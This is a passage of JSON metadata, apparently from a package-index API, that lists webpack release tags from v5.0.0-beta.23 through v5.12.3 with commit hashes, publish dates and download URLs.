","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21e